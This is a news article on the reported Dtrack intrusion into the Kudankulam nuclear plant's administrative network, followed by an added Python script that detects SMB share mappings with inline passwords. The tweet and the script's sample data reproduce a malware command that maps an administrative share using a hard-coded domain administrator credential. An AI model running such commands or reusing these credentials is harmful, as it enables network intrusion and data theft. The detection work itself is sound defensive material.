Various reports and rumors yesterday speculated that India’s Kudankulam Nuclear Power Plant (KNPP) was hit by a cyberattack. A cybersecurity expert who was involved in detecting the intrusion claims that the attack originated from foreign soil, probably North Korea.
Interesting potential DTRACK (CC @Mao_Ware)
Dumps the data-mined output via a manually mapped share over SMB to an RFC1918 address with a statically encoded user/pass:
> net use \\10.38.1.35\C$ su.controller5kk /user:KKNPP\administrator
— くず (@a_tweeter_user) October 28, 2019
On 28 October, cybersecurity professional Pukhraj Singh announced that he had been alerted by a “third party” who discovered the attack, and that he, in turn, had alerted the National Cyber Security Coordinator.
KNPP responded to the report by denying that any sensitive systems had been compromised, and issued the following statement:
“KNPP and other Indian nuclear power plants are not connected to outside cyber network and internet. Any cyber-attack on the Nuclear Power Plant Control System is not possible.”
Singh has a history of working with government agencies. After the statement was issued, he clarified that the compromise was of an administrative network, not the operational one.
“I think they’re confusing the domain controller with control network. I didn’t claim the latter… The administrative (not operational) network was certainly popped,” he said.
While the attack did not affect reactor controls, it may have exposed research and technical data. The attack focused on collecting technical information and used a Windows SMB network share, mapped with credentials hard-coded into the malware, to gather the files to be stolen.
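The hard-coded share mapping described above, and quoted in the tweet earlier on the page, is a pattern a defender can hunt for in process-creation telemetry (Sysmon Event ID 1 or Windows Security 4688 command lines). The following Python is an added example written for this page, not code from the article, from Kaspersky or from any vendor. The sample command lines are constructed; the first mirrors the quoted command, the others are invented for contrast. The `Finding` class, the `analyze_command_line` / `scan` / `suspicious_mappings` helpers and the scoring rule are the example’s own choices, not a documented detection.

```python
"""Detect hard-coded SMB share mappings in process-creation command lines.

Added example for this page. It parses "net use" invocations that map a
remote share, and flags those that carry an inline password, target an
administrative share (C$, ADMIN$, ...), or point at an RFC 1918 address.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample command lines (Sysmon Event ID 1 / 4688 style). The first
# mirrors the pattern quoted in the article; the rest are invented for contrast.
SAMPLE_COMMAND_LINES = [
    r"net use \\10.38.1.35\C$ su.controller5kk /user:KKNPP\administrator",
    r"net use Z: \\fileserver01\shared /persistent:yes",
    r"C:\Windows\System32\net.exe use \\192.168.7.20\ADMIN$ /user:CORP\svc_backup P@ss-constructed",
    r"net.exe use * /delete /y",
    r"net use \\203.0.113.9\C$ hunter2 /user:guest",
]

# Strictly RFC 1918 space; ipaddress.is_private is wider (documentation ranges etc.).
RFC1918_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# net [use] <optional drive letter> \\host\share <everything else>
NET_USE_RE = re.compile(
    r"""^\s*(?:\S*\\)?net(?:\.exe)?\s+use\s+      # bare "net" or a full path to net.exe
        (?:[A-Za-z]:\s+)?                        # optional drive letter, e.g. Z:
        \\\\(?P<host>[^\\\s]+)\\(?P<share>\S+)   # \\host\share
        (?P<rest>.*)$""",
    re.IGNORECASE | re.VERBOSE,
)
USER_RE = re.compile(r"^/user:(?P<user>\S+)$", re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    host: str
    share: str
    user: Optional[str]
    inline_password: bool   # a password token is on the command line (value deliberately not stored)
    admin_share: bool       # share name ends in "$": C$, ADMIN$, IPC$ and the like
    rfc1918_target: bool    # destination host is an RFC 1918 address

    @property
    def suspicious(self) -> bool:
        # Credentials baked into the command line plus an administrative share is
        # the staging pattern the article describes; a share name alone is not enough.
        return self.inline_password and self.admin_share


def is_rfc1918(host: str) -> bool:
    """True only for RFC 1918 addresses; hostnames and public IPs return False."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False
    return any(addr in net for net in RFC1918_NETS)


def analyze_command_line(cmd: str) -> Optional[Finding]:
    """Return a Finding for a command line that maps a remote share, else None."""
    m = NET_USE_RE.match(cmd)
    if not m:
        return None
    user = None
    inline_password = False
    for tok in m.group("rest").split():
        um = USER_RE.match(tok)
        if um:
            user = um.group("user")
        elif tok.startswith("/") or tok == "*":
            continue                 # other switches, or "*" = prompt for the password
        else:
            inline_password = True   # a positional token that is not a switch: the password
    return Finding(
        command_line=cmd,
        host=m.group("host"),
        share=m.group("share"),
        user=user,
        inline_password=inline_password,
        admin_share=m.group("share").endswith("$"),
        rfc1918_target=is_rfc1918(m.group("host")),
    )


def scan(command_lines: List[str]) -> List[Finding]:
    """All share mappings found in the given command lines."""
    return [f for f in map(analyze_command_line, command_lines) if f is not None]


def suspicious_mappings(command_lines: List[str]) -> List[Finding]:
    """Only the mappings that combine an inline password with an administrative share."""
    return [f for f in scan(command_lines) if f.suspicious]


if __name__ == "__main__":
    for f in suspicious_mappings(SAMPLE_COMMAND_LINES):
        print(f"ALERT host={f.host} share={f.share} user={f.user} "
              f"rfc1918={f.rfc1918_target}: {f.command_line}")
```

The finding records only that a password was present, not the password itself, so the alert can be forwarded to a SIEM without copying a credential into yet another log store. The RFC 1918 check is kept separate from the suspicion score: an internal staging host is consistent with the incident described, but a mapping to a public address with hard-coded credentials deserves the same attention.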
According to Kaspersky, the malware involved is Dtrack — which is believed to be the work of North Korea’s Lazarus threat group.
Meanwhile, KNPP, the largest nuclear facility in India, says the plant is safe from cyberattacks because the control-system network is isolated from the plant’s administrative networks.
However, the officials have not yet addressed what data might have been stolen.